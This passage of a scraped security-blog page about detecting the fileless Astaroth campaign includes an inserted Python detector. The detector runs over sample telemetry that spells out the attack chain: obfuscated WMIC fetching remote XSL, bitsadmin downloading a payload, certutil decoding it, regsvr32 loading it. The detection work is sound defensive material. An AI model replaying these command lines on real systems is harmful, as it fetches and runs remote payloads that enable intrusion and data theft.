100vw, 400px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"382\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/07\/d1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center.png\" alt=\"Details of Windows Defender Antivirus detections of fileless techniques and malware reported in Microsoft Defender Security Center; details also indicate whether threat is remediated, as was the case with the Astaroth attack\" class=\"wp-image-89620\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/d1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center.png 400w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/d1-Windows-Defender-AV-detection-in-Microsoft-Defender-Security-Center-300x287.png 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 4. Details of Windows Defender Antivirus detections of fileless techniques and malware reported in Microsoft Defender Security Center; details also indicate whether threat is remediated, as was the case with the Astaroth attack<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The rest of Microsoft Defender ATP&#8217;s capabilities beyond Antivirus enable security operations teams to detect and remediate fileless threats and other attacks. 
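As an added example that is not part of the original post and is not Microsoft's own detection logic, the block below shows the kind of behavior-based rules and process-tree correlation that turn the individually legitimate tool invocations in Steps 1 through 7 into one alert. It runs over constructed process-creation events of the sort Sysmon Event ID 1 or Microsoft Defender ATP advanced hunting expose; the event fields, rule names, thresholds (three distinct techniques under one ancestor within ten minutes), host names and file paths are this example's assumptions. Two benign events at the end (a local `/format:csv` query and a normal DLL registration) are there to show that the rules stay quiet on ordinary administration. The logic generalises past Astaroth: any chain of three or more of the four techniques under one ancestor is reported, whatever the payload file names.

```python
# Added example, not code from the original post or from Microsoft: behavior-based detection of
# the living-off-the-land chain in Steps 1-7, run over constructed process-creation events.
import re
from collections import defaultdict
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcessEvent:               # minimal process-creation record; this example's own field names
    ts: int                       # event time, seconds
    pid: int
    ppid: int
    image: str                    # full path of the created process
    cmdline: str                  # command line exactly as logged

def normalize(cmdline: str) -> str:
    """Undo cheap cmd.exe obfuscation (caret escapes, quoting, case, spacing) before matching."""
    stripped = cmdline.replace("^", "").replace('"', "").replace("'", "")
    return re.sub(r"\s+", " ", stripped).strip().lower()

URL = r"https?://\S+"
LOADABLE = {".dll", ".ocx", ".ax", ".cpl"}   # extensions regsvr32 is normally handed

def regsvr32_target_is_odd(c: str) -> bool:
    """True when regsvr32's target (last non-switch token) has an extension such as '.~'."""
    args = [t for t in c.split(" ")[1:] if not t.startswith("/")]
    if not args:
        return False
    base = args[-1].rsplit("\\", 1)[-1]
    ext = base[base.rfind("."):] if "." in base else ""
    return ext not in LOADABLE

# (rule name, MITRE technique, binary, predicate over the normalized command line)
RULES = [
    ("wmic /format fetching a remote XSL", "T1220", "wmic.exe",
     lambda c: re.search(r"/format:\s*" + URL, c) is not None),
    ("bitsadmin transfer from a URL", "T1197", "bitsadmin.exe",
     lambda c: "/transfer" in c and re.search(URL, c) is not None),
    ("certutil decoding a file", "T1140", "certutil.exe",
     lambda c: "-decode" in c or "/decode" in c),
    ("regsvr32 loading an unusual extension", "T1117", "regsvr32.exe", regsvr32_target_is_odd),
]

def match_rules(ev: ProcessEvent) -> list:
    exe = ev.image.rsplit("\\", 1)[-1].lower()
    c = normalize(ev.cmdline)
    return [(name, tid) for name, tid, binary, pred in RULES if exe == binary and pred(c)]

def root_of(pid: int, by_pid: dict) -> int:
    """Walk ppid links to the top-most process we hold a record for (PID reuse is ignored here)."""
    seen = set()
    while pid in by_pid and by_pid[pid].ppid in by_pid and pid not in seen:
        seen.add(pid)
        pid = by_pid[pid].ppid
    return pid

def lineage(pid: int, by_pid: dict) -> list:
    """Ancestor-to-descendant image names, for the analyst reading the alert."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(by_pid[pid].image.rsplit("\\", 1)[-1].lower())
        pid = by_pid[pid].ppid
    return names[::-1]

def detect(events, window: int = 600, min_techniques: int = 3):
    """Return (per-event hits, chains). A chain needs min_techniques distinct techniques under one
    ancestor within `window` seconds; both thresholds are assumptions for this example."""
    by_pid = {e.pid: e for e in events}
    hits, per_root = [], defaultdict(list)
    for e in events:
        for name, tid in match_rules(e):
            hits.append((e.pid, name, tid))
            per_root[root_of(e.pid, by_pid)].append((e.ts, e.pid, tid))
    chains = []
    for root, seq in per_root.items():
        seq.sort()
        tids = sorted({tid for _, _, tid in seq})
        if len(tids) >= min_techniques and seq[-1][0] - seq[0][0] <= window:
            chains.append({"root": root, "techniques": tids, "lineage": lineage(seq[-1][1], by_pid)})
    return hits, chains

# Constructed sample telemetry mirroring Steps 1-6; host names and paths are placeholders.
S32 = r"C:\Windows\System32"
EVENTS = [
    ProcessEvent(1000, 100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcessEvent(1001, 200, 100, S32 + r"\cmd.exe", r'cmd.exe /c W^MI^C os get /format:"https://cdn.example.net/v.txt"'),  # Step 1, caret-obfuscated
    ProcessEvent(1002, 300, 200, S32 + r"\wbem\WMIC.exe", r'WMIC os get /format:"https://cdn.example.net/v.txt"'),   # Step 2
    ProcessEvent(1003, 301, 300, S32 + r"\wbem\WMIC.exe", r'WMIC os get /format:"https://cdn.example.net/vv.txt"'),  # Step 3
    ProcessEvent(1004, 400, 301, S32 + r"\bitsadmin.exe",                                                            # Step 4
                 r"bitsadmin /transfer j /download https://cdn.example.net/falxconxrenw64.~ C:\Users\Public\falxconxrenw64.~"),
    ProcessEvent(1005, 401, 301, S32 + r"\certutil.exe",                                                             # Step 5
                 r"certutil -decode C:\Users\Public\falxconxrenw64.~ C:\Users\Public\falxconxrenw64.~"),
    ProcessEvent(1006, 402, 301, S32 + r"\regsvr32.exe", r"regsvr32 /s C:\Users\Public\falxconxrenw64.~"),          # Step 6
    # Benign noise that must stay quiet: a local /format query and a normal DLL registration
    ProcessEvent(2000, 500, 1, S32 + r"\wbem\WMIC.exe", "wmic logicaldisk get name,size /format:csv"),
    ProcessEvent(2001, 501, 1, S32 + r"\regsvr32.exe", r'regsvr32 /s "C:\Program Files\Vendor\comctl.dll"'),
]

if __name__ == "__main__":
    found, correlated = detect(EVENTS)
    print(*found, *correlated, sep="\n")
```

On the sample events the four per-process rules fire on both WMIC instances, on bitsadmin, on certutil and on regsvr32, and the correlation step reports a single chain rooted at the explorer.exe process that opened the LNK, with the lineage explorer.exe, cmd.exe, wmic.exe, wmic.exe, regsvr32.exe. A production version would key on further context the analysis above gives (regsvr32 later creating userinit.exe, the DLL's age and prevalence) and would track process GUIDs rather than PIDs to survive PID reuse.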
Notably, Microsoft Defender ATP <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/microsoft-defender-atp\/overview-endpoint-detection-response\">endpoint detection and response<\/a> (EDR) has strong and durable detections for fileless and living-off-the-land techniques across the entire attack chain.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"534\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/07\/a1-astaroth_alert_Microsoft-Defender-ATP.png\" alt=\"screenshot\" class=\"wp-image-89617\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/a1-astaroth_alert_Microsoft-Defender-ATP.png 400w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/a1-astaroth_alert_Microsoft-Defender-ATP-225x300.png 225w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image\"><img loading=\"lazy\" decoding=\"async\" width=\"400\" height=\"534\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\/wp-content\/uploads\/2019\/07\/b1-astaroth_alert_Microsoft-Defender-ATP.png\" alt=\"Alerts in Microsoft Defender Security Center showing detection of fileless techniques by antivirus and EDR capabilities\n\n\" class=\"wp-image-89618\" srcset=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/b1-astaroth_alert_Microsoft-Defender-ATP.png 400w, https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/b1-astaroth_alert_Microsoft-Defender-ATP-225x300.png 225w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><em>Figure 5. 
Alerts in Microsoft Defender Security Center showing detection of fileless techniques by antivirus and EDR capabilities<\/em><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We also published a <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/security\/threat-protection\/microsoft-defender-atp\/threat-analytics\">threat analytics<\/a> report on living-off-the-land binaries to help security operations assess organizational security posture and resilience against these threats. New Microsoft Defender ATP services like <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/02\/microsofts-threat-vulnerability-management-now-helps-thousands-of-customers-to-discover-prioritize-and-remediate-vulnerabilities-in-real-time\/\">threat and vulnerability management<\/a> and <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/02\/28\/announcing-microsoft-threat-experts\/\">Microsoft Threat Experts<\/a> (managed threat hunting) further assist organizations in defending against fileless threats.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Through signal-sharing and orchestration of threat remediation across Microsoft\u2019s security technologies, these protections are further amplified in <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/technology\/threat-protection\">Microsoft Threat Protection<\/a>, Microsoft\u2019s comprehensive security solution for the modern workplace. 
For this Astaroth campaign, Office 365 Advanced Threat Protection (<a href=\"https:\/\/docs.microsoft.com\/en-us\/office365\/securitycompliance\/office-365-atp\">Office 365 ATP<\/a>) detects the emails with malicious links that start the infection chain.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.microsoft.com\/en-us\/security\/technology\/threat-protection\">Microsoft Threat Protection<\/a> secures identities, endpoints, email and data, apps, and infrastructure.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"conclusion-fileless-threats-are-not-invisible\">Conclusion: Fileless threats are not invisible<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">To come back to one of my original points in this blog post, being fileless doesn\u2019t mean being invisible; it certainly doesn\u2019t mean being undetectable.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">An analogy: Pretend you are transported to the world of H.G. Wells\u2019 <a href=\"https:\/\/en.wikipedia.org\/wiki\/The_Invisible_Man\">The Invisible Man<\/a> and can render yourself invisible. You think, great, you can walk straight into a bank and steal money. However, you soon realize that things are not as simple as they sound. When you walk out in the open and it\u2019s cold, your breath\u2019s condensation gives away your position; depending on the type of the ground, you can leave visible footmarks; if it\u2019s raining, water splashing on you creates a visible outline. If you manage to get inside the bank, you still make noise that security guards can hear. Motion detection sensors can feel your presence, and infrared cameras can still see your body heat. Even if you can open a safe or a vault, these storage devices may trigger an alert, or someone may simply notice the safe opening. 
Not to mention that if you somehow manage to grab the money and put it in a bag, people are likely to notice a bag that\u2019s walking itself out of the bank.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Being invisible may help you with some things, but you should not be under the illusion that you are invincible. The same applies to fileless malware: abusing fileless techniques does not put malware beyond the reach or visibility of security software. On the contrary, some of the fileless techniques may be so unusual and anomalous that they draw immediate attention to the malware, in the same way that a bag of money moving by itself would.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Using invisible techniques and being actually invisible are two different things. Using advanced technologies, Microsoft Defender ATP exposes fileless threats like Astaroth before these attacks can cause more damage.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong><em>Andrea Lelli<\/em><\/strong><br><em>Microsoft Defender ATP Research<\/em><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"talk-to-us\">Talk to us<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Questions, concerns, or insights on this story? 
Join discussions at the&nbsp;<a href=\"https:\/\/techcommunity.microsoft.com\/t5\/Windows-Defender-Advanced-Threat\/ct-p\/WindowsDefenderAdvanced\">Microsoft Defender ATP community<\/a>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Follow us on Twitter <a href=\"https:\/\/twitter.com\/MsftSecIntel\" target=\"_blank\" rel=\"noopener noreferrer\"><strong>@MsftSecIntel<\/strong><\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Advanced technologies in Microsoft Defender ATP&#8217;s Antivirus exposed and defeated a widespread fileless campaign that completely \u201clived off the land\u201d throughout a complex attack chain that run the info-stealing backdoor Astaroth directly in memory <\/p>\n","protected":false},"author":68,"featured_media":89711,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ms_queue_id":[],"ep_exclude_from_search":false,"_classifai_error":"","_classifai_text_to_speech_error":"","_alt_title":"","ms-ems-related-posts":[85438,90776,89915],"footnotes":""},"post_tag":[3921],"threat-intelligence":[3727],"content-type":[3663],"job-role":[],"product":[],"topic":[3687],"coauthors":[1968],"class_list":["post-89592","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","tag-living-off-the-land","threat-intelligence-attacker-techniques-tools-and-infrastructure","content-type-research","topic-threat-intelligence","review-flag-1694638265-576","review-flag-1-1694638265-354","review-flag-2-1694638266-864","review-flag-3-1694638266-241","review-flag-4-1694638266-512","review-flag-5-1694638266-171","review-flag-6-1694638266-691","review-flag-7-1694638266-851","review-flag-lever-1694638263-909","review-flag-man-1694638264-816","review-flag-new-1694638263-340"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.2 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Dismantling a fileless campaign: Microsoft Defender ATP&#039;s Antivirus 
exposes Astaroth attack | Microsoft Security Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Dismantling a fileless campaign: Microsoft Defender ATP&#039;s Antivirus exposes Astaroth attack | Microsoft Security Blog\" \/>\n<meta property=\"og:description\" content=\"Advanced technologies in Microsoft Defender ATP&#039;s Antivirus exposed and defeated a widespread fileless campaign that completely \u201clived off the land\u201d throughout a complex attack chain that run the info-stealing backdoor Astaroth directly in memory\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\" \/>\n<meta property=\"og:site_name\" content=\"Microsoft Security Blog\" \/>\n<meta property=\"article:published_time\" content=\"2019-07-08T16:00:51+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-12-21T22:06:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/Astaroth-fileless-attack-chain-social-2.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Microsoft Defender Security Research Team\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:image\" 
content=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/Astaroth-fileless-attack-chain-social-2.png\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Microsoft Defender Security Research Team\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\"},\"author\":[{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/windows-defender-research\/\",\"@type\":\"Person\",\"@name\":\"Microsoft Defender Security Research Team\"}],\"headline\":\"Dismantling a fileless campaign: Microsoft Defender ATP&#8217;s Antivirus exposes Astaroth 
attack\",\"datePublished\":\"2019-07-08T16:00:51+00:00\",\"dateModified\":\"2025-12-21T22:06:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\"},\"wordCount\":2104,\"publisher\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg\",\"keywords\":[\"Living off the land\"],\"articleSection\":[\"AI and machine learning\",\"Cybersecurity\",\"Endpoint security\",\"Security Intelligence\",\"Security intelligence\",\"Threat protection\",\"Windows Security\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\",\"name\":\"Dismantling a fileless campaign: Microsoft Defender ATP's Antivirus exposes Astaroth attack | Microsoft Security 
Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg\",\"datePublished\":\"2019-07-08T16:00:51+00:00\",\"dateModified\":\"2025-12-21T22:06:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg\",\"contentUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg\",\"width\":440,\"height\":268},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\"
:\"Home\",\"item\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Dismantling a fileless campaign: Microsoft Defender ATP&#8217;s Antivirus exposes Astaroth attack\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\",\"name\":\"Microsoft Security Blog\",\"description\":\"Expert coverage of cybersecurity topics\",\"publisher\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization\",\"name\":\"Microsoft Security Blog\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png\",\"contentUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2018\/08\/cropped-cropped-microsoft_logo_element.png\",\"width\":512,\"height\":512,\"caption\":\"Microsoft Security Blog\"},\"image\":{\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#\/schema\/person\/060b835777058efc81d6828a64820f98\",\"name\":\"Microsoft Security Threat Intelligence - 
Editor\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g52243f56b7f8688616d4ca12dc0148e2\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/52c6f8d687a54d49c87e04326b24f4ed410c7a6535e21df3cca90d21039c9089?s=96&d=microsoft&r=g\",\"caption\":\"Microsoft Security Threat Intelligence - Editor\"},\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/eravena\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Dismantling a fileless campaign: Microsoft Defender ATP's Antivirus exposes Astaroth attack | Microsoft Security Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/","og_locale":"en_US","og_type":"article","og_title":"Dismantling a fileless campaign: Microsoft Defender ATP's Antivirus exposes Astaroth attack | Microsoft Security Blog","og_description":"Advanced technologies in Microsoft Defender ATP's Antivirus exposed and defeated a widespread fileless campaign that completely \u201clived off the land\u201d throughout a complex attack chain that run the info-stealing backdoor Astaroth directly in memory","og_url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/","og_site_name":"Microsoft Security 
Blog","article_published_time":"2019-07-08T16:00:51+00:00","article_modified_time":"2025-12-21T22:06:33+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/Astaroth-fileless-attack-chain-social-2.png","type":"image\/png"}],"author":"Microsoft Defender Security Research Team","twitter_card":"summary_large_image","twitter_image":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/08\/Astaroth-fileless-attack-chain-social-2.png","twitter_misc":{"Written by":"Microsoft Defender Security Research Team","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#article","isPartOf":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/"},"author":[{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/author\/windows-defender-research\/","@type":"Person","@name":"Microsoft Defender Security Research Team"}],"headline":"Dismantling a fileless campaign: Microsoft Defender ATP&#8217;s Antivirus exposes Astaroth 
attack","datePublished":"2019-07-08T16:00:51+00:00","dateModified":"2025-12-21T22:06:33+00:00","mainEntityOfPage":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/"},"wordCount":2104,"publisher":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#organization"},"image":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg","keywords":["Living off the land"],"articleSection":["AI and machine learning","Cybersecurity","Endpoint security","Security Intelligence","Security intelligence","Threat protection","Windows Security"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/","name":"Dismantling a fileless campaign: Microsoft Defender ATP's Antivirus exposes Astaroth attack | Microsoft Security 
Blog","isPartOf":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage"},"image":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg","datePublished":"2019-07-08T16:00:51+00:00","dateModified":"2025-12-21T22:06:33+00:00","breadcrumb":{"@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#primaryimage","url":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg","contentUrl":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2019\/07\/Astaroth-blog-1.jpg","width":440,"height":268},{"@type":"BreadcrumbList","@id":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2019\/07\/08\/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.microsoft.com\/en-us\/security\/blog\/"},{"@type":"ListItem","p
